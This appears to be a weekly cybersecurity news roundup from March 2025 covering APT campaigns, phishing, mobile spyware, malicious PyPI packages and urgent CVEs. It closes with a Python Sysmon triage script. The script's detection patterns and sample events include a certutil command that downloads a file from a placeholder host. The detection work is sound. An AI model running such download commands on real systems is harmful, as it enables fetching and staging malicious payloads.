This week’s global cybersecurity roundup shows just how fast things are moving on both sides of the cyber battlefield. On one end, threat actors are breaking into outdated routers, sneaking into app stores, and spreading malware through trusted platforms like YouTube and GitHub.
On the other end, researchers are building new decryptors, governments are pressing charges, and security vendors are tightening controls.
Here’s your in-depth look at the stories shaping cyber defense and offense for March 2025.
China-Linked UNC3886 Breaches End-of-Life Juniper Routers
Old routers are still powering networks—and attackers know it
One of the biggest threats this week came from UNC3886, a Chinese advanced persistent threat (APT) group. They targeted outdated Juniper Networks MX Series routers, specifically those no longer receiving updates.
Using six custom backdoors, they gained full access to fewer than ten organizations worldwide. These backdoors included tools that could disable logging, run commands through hidden scripts, and operate silently in the background.
At least one exploited flaw, CVE-2025-21590, allowed the group to sidestep built-in protections and run code remotely. The campaign serves as a serious warning to organizations still relying on end-of-life hardware.
ClickFix Tactic Used in New Phishing Campaign
Phishing just got more dangerous—with stolen logins and drained accounts
A group called Storm-1865 is tricking people with fake Booking.com emails, directing them to credential-harvesting pages. The twist? They’re using a technique known as ClickFix, which abuses legitimate links to bypass security filters.
This campaign, running since late 2024, has spread across nearly every continent. Victims who fall for the scheme have their login details and financial data stolen, which are then used in follow-up fraud operations.
KoSpy Malware Found in Android Apps on Google Play
North Korean actors sneak spying tools into your phone under the guise of utilities
The ScarCruft group, tied to North Korea, uploaded apps to the Google Play Store that looked like harmless tools. In reality, these apps installed KoSpy, a surveillance malware that could steal:
- Text messages
- Call history
- Files
- Locations
- Audio recordings
- Screenshots
Though the apps have been removed, the campaign traces back to 2022, showing how persistent these threat actors are at embedding spyware into trusted ecosystems.
SideWinder Targets Maritime and Logistics Companies
This APT is going after shipping and supply chains worldwide
Another group, known as SideWinder, has been hitting logistics firms in Asia, the Middle East, and Africa. Using a post-infection toolkit called StealerBot, the group grabs login data, internal communications, and proprietary logistics data.
Their focus on the maritime sector suggests an interest in tracking movements of goods, port infrastructure, or sensitive cargo.
LockBit Ransomware Developer Extradited to the U.S.
Cybercrime isn’t anonymous forever—justice catches up
In a big win for law enforcement, Rostislav Panev, a developer behind the LockBit ransomware group, was extradited from Israel to face charges in the United States. Between 2022 and early 2024, he reportedly earned over $230,000 from LockBit attacks.
His arrest came after authorities took down key parts of the group’s infrastructure. His prosecution may help build more cases against others involved in similar operations.
PyPI Supply Chain Attack Reveals 20 Malicious Packages
Fake packages can poison your codebase without warning
Researchers discovered 20 malicious Python packages uploaded to PyPI, disguised as useful developer tools. These packages were downloaded more than 14,000 times before removal.
Some of them were used by a popular GitHub project called accesskey_tools, which had hundreds of stars and dozens of forks—showing how easily malware can spread through trusted dev ecosystems.
Critical CVEs to Patch Right Now
Outdated software is a hacker’s best friend—update now
This week’s top vulnerabilities include critical flaws in systems from Microsoft, Apple, Apache, Cisco, TP-Link, and others. Some of the most urgent include:
- CVE-2025-26633 (Windows)
- CVE-2025-25291 and CVE-2025-25292 (ruby-saml)
- CVE-2024-13871 and CVE-2024-13872 (Bitdefender BOX v1)
- CVE-2025-27816 (Arctera InfoScale)
- CVE-2025-27017 (Apache NiFi)
- CVE-2025-27593 (SICK DL100 series)
- CVE-2025-27509 (Fleet software)
Check your systems and apply these patches to prevent remote code execution, privilege escalation, and data theft.
Positive News: New Ransomware Decryptor for Akira Linux Variant
Not all hope is lost—researchers strike back
A researcher named Yohanes Nugroho has released a decryptor for the Linux version of Akira ransomware, giving victims a chance to unlock their data without paying.
This tool leverages GPU power to retrieve the encryption keys and is freely available on GitHub. It’s a powerful reminder that the cyber community can fight back with the right tools and dedication.
Chinese Volt Typhoon Hackers Infiltrated U.S. Electric Company
A near year-long breach with physical infrastructure risks
The Volt Typhoon group, believed to be Chinese state-sponsored hackers, stayed inside a U.S. electric utility network for over 300 days. The breach was discovered just before Thanksgiving 2023.
Although no customer data was compromised, the attackers explored systems tied to energy operations and OT networks. They entered through a vulnerable Fortinet firewall used by a third-party provider.
The long-term goal appears to be strategic sabotage, should tensions between China and the U.S. escalate.
YouTube Used to Spread DCRat Backdoor
Gamers become victims again through fake cheat downloads
The Dark Crystal RAT (DCRat) is making a comeback via YouTube. Attackers create or hijack accounts to post videos advertising game hacks and bots. Once users click on the links in the video description, malware is downloaded.
DCRat allows attackers to record keystrokes, steal passwords, activate webcams, and more. Kaspersky identified over 34 plug-ins for this malware and tracked its activity mainly in Russia, Belarus, and Kazakhstan.
New Threat: OAuth App Phishing for Microsoft 365
Fake login apps fool users into giving full access to attackers
Proofpoint reported two targeted phishing campaigns using fake OAuth apps disguised as Adobe and Docusign tools. These apps trick users into granting permissions, which attackers then use to take over Microsoft 365 accounts.
This method allows access without needing a password and can evade traditional email security filters.
Wi-Fi Jamming Gets Laser Precision
RIS-based jamming can knock out devices without affecting others
Researchers have created a precise Wi-Fi jamming method using Reconfigurable Intelligent Surfaces (RIS). This tech lets attackers disable a single device’s connection while leaving nearby systems untouched.
It’s like jamming with a sniper scope—perfect for targeted denial-of-service attacks on sensitive equipment.
Other Notable Headlines
- Jupyter Notebooks are being targeted for cryptomining
- ESP32 chip controversy shows the risks of debug commands becoming backdoors
- Switzerland now requires critical infrastructure providers to report cyberattacks within 24 hours
- BYOVD evolves into BYOTB and BYOVE, with attackers abusing legit drivers, binaries, and even trusted enclaves
- NIST adds HQC as a backup post-quantum cryptography algorithm for future threats
- Mandiant flags concerns over Microsoft’s Time Travel Debugging framework potentially masking vulnerabilities
Tip of the Week: Monitor for Suspicious Processes Using Sysmon
Detect threats early by watching how programs launch
Use Sysmon process-creation events and Windows Security Event ID 4688 to monitor launches of uncommon or risky tools such as rundll32.exe or certutil.exe. Combine this with a free SIEM like ELK or Graylog for real-time alerts.
Set up process auditing through Group Policy and use trusted community configurations for Sysmon to reduce noise and focus on real threats.
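As an added illustration of the tip above (not code from the article or from the Sysmon project), the following Python triage logic normalizes Sysmon Event ID 1 and Security Event ID 4688 records into one shape, then rates launches of rundll32.exe and certutil.exe by whether their arguments or parent process look unusual, so routine uses are logged rather than paged. The event records, field names as simplified dicts, and the argument patterns are constructed assumptions for the example.

```python
import re
from typing import Optional, Tuple

# LOLBins the tip names; the argument patterns separate routine use from abuse worth paging on.
RISKY_IMAGES = {"rundll32.exe", "certutil.exe"}
SUSPICIOUS_ARGS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.IGNORECASE),
    "rundll32.exe": re.compile(r"javascript:|\\appdata\\|\\temp\\", re.IGNORECASE),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def normalize(event: dict) -> Optional[dict]:
    """Map Sysmon EID 1 and Security EID 4688 field names onto one shape."""
    if event.get("EventID") == 1:  # Sysmon ProcessCreate
        return {"image": event["Image"], "cmd": event.get("CommandLine", ""),
                "parent": event.get("ParentImage", "")}
    if event.get("EventID") == 4688:  # Security audit; CommandLine only exists if command-line auditing is on
        return {"image": event["NewProcessName"], "cmd": event.get("CommandLine", ""),
                "parent": event.get("ParentProcessName", "")}
    return None

def classify(event: dict) -> Optional[Tuple[str, str]]:
    """(severity, reason) for a risky launch; None for anything else."""
    rec = normalize(event)
    if rec is None or (image := basename(rec["image"])) not in RISKY_IMAGES:
        return None
    reasons = []
    if SUSPICIOUS_ARGS[image].search(rec["cmd"]):
        reasons.append("suspicious arguments")
    if (parent := basename(rec["parent"])) in OFFICE_PARENTS:
        reasons.append(f"spawned by {parent}")
    if reasons:
        return ("high", f"{image}: {', '.join(reasons)}")
    return ("low", f"{image}: risky binary launched, no other indicator")  # log, don't page

def scan(events: list) -> list:  # keep only the hits, tagged with the source event ID
    return [(ev["EventID"],) + hit for ev in events if (hit := classify(ev))]

SAMPLE_EVENTS = [  # constructed, simplified records, not real EVTX output
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -f http://example.invalid/a.txt a.txt"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dat,Start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]
```

Running `scan(SAMPLE_EVENTS)` rates the first two records high and the control-panel rundll32 launch low, which is the noise-versus-signal split a tuned Sysmon configuration aims for.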
Final Thoughts
The key message this week? Cyber threats are no longer hiding in the shadows—they’re hiding in plain sight. Whether it’s a gaming video, a cloud tool, or a legacy router, the entry points for attackers are everywhere.
But defenders are not powerless. With the right tools, community collaboration, and a proactive mindset, we can uncover hidden threats, respond faster, and shut down attackers before they cause real damage.
Stay alert, stay informed, and never stop learning—because the next threat is already in motion.